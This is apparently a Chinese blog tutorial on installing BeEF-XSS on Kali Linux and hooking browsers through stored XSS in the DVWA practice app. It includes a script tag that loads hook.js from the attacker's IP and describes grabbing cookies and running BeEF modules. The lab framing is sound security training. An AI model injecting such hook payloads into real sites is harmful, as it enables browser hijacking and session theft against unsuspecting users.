kali2021安装beef-xss和使用

最新推荐文章于 2024-06-01 16:36:53 发布
最新推荐文章于 2024-06-01 16:36:53 发布
阅读量3.3k 收藏 30
点赞数 2
文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53365842/article/details/123825616
版权

安装beef:apt install beef-xss
切换到beef目录(kali版本不同,beef配置文件位置不同):

cd /etc/beef-xss/config.yaml

或者

cd /usr/share/beef-xss/config.yaml

打开配置文件:

vim /etc/beef-xss/config.yaml /
vim /usr/share/beef-xss/config.yaml

修改密码和修改host值,改成kali的IP地址
在这里插入图片描述
启动beef:beef-xss/beef或者beef-xss
打开浏览器访问:http://192.168.128.128:3000/ui/panel
或者
http://192.168.128.128:3000/ui/authentication
在这里插入图片描述
让目标主机访问存在生成的钩子代码
在这里插入图片描述

<html>
<body>
123456
<script src="http://192.168.183.133:3000/hook.js"></script>
</body>
</html>

在DVWA中DVWA Security中把等级该为"low"然后选择XSS(Stroed)存储型XSS,上传脚本,并把长度改为1000,因为原来长度为50,写不下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
获取控制权限
绿色模块:表示模块适用当前用户,并且执行结果对用户不可见
红色模块:表示模块不适用当前用户,有些红色模块也可以执行
橙色模块:模块可用,但结果对用户可见
灰色模块:模块为在目标浏览器上测试过
在这里插入图片描述
获取cookie
在这里插入图片描述
选择模块,进行攻击
可以选择"Brower"下面的"Hooked
Domain"的"create Alert Dialog(弹窗)",点击右下角的"execute"运行
在这里插入图片描述
在这里插入图片描述

Starry丶丶
关注
  • 2
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali-linux-2021.3-vmware-amd64.part3.rar
09-29
Kali Linux VMware(kali-linux-2021.3-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2021.3-vmware-amd64.part3.rar ... kali-linux-2021.3-vmware-amd64.part2....
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali安装 beef-xss
挖到0day了吗?
02-27 694
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
XSS另类攻击(四)kali系统beef-xss安装使用
最新发布
06-01 879
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
kali安装beef-xss
qq_63261741的博客
04-14 488
【代码】kali安装beef-xss
kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 1926
kali环境下安装Beef-Xss靶场搭建
Kali安装beef-xss
qq_58000413的博客
08-10 2244
不更新可能会出现下面的情况:metasploit-framework : 依赖: ruby (< 1:2.8) 但是 1:3.0+1kali1 正要被安装。#把192.168.199.129替换成本机IP。
新版kali安装beef-xss一大堆报错解决办法
qq_51550750的博客
04-03 2226
问题说明 在kali中,安装beef-xss,因为旧版本有,但我的是新版本,所以需要重新安装安装命令非常简单: beef-xss 只要在终端执行上面的命令即可,中间需要输入几次“y”. 但是我尝试多次,每次都是在下载到70%左右的时候报了一大堆错。 但是我看到了最后的提示: maybe run apt-get update or try with --fix-missing? 解决办法 于是我按照提示进行尝试: sudo apt-get update 上面这个命令执行时间可能会长一些,需要耐心
Kali BeEF-XSS使用
nlj1860453的博客
01-08 456
kali终端输入“beef-xss”,显示没有安装。回车它会提示是否安装,输入y,等待安装完毕。
kali安装beef-xss(笔者的踩坑之旅)
m0_52403371的博客
04-03 2216
kali安装beef-xss(笔者的踩坑之旅)
Kali安装beef-xss启动失败
wyzhxhn的博客
11-19 784
beef-xss
kali-linux-2021.3-virtualbox-amd64.part1.rar
09-29
Kali Linux VirtualBox(kali-linux-2021.3-virtualbox-amd64.ova)文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-virtualbox-amd64.part5.rar ... kali-linux-2021.3-...
kali-linux-2021.3-installer-amd64.part1.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali-linux-2021.3-installer-arm64.part3.rar
09-29
kali-linux-2021.3-installer-arm64.iso适用于苹果arm芯片macOS系统,文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用kali-linux-2021.3-installer-arm64.part4.rar ... kali-linux-2021.3-...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 5281
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 3833
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7568
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
kali如何安装beef-xss
05-14
要在Kali Linux上安装BeEF(The Browser Exploitation Framework),请按照以下步骤进行: 1. 打开终端并更新软件包列表: ``` sudo apt-get update ``` 2. 安装BeEF: ``` sudo apt-get install beef-xss ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值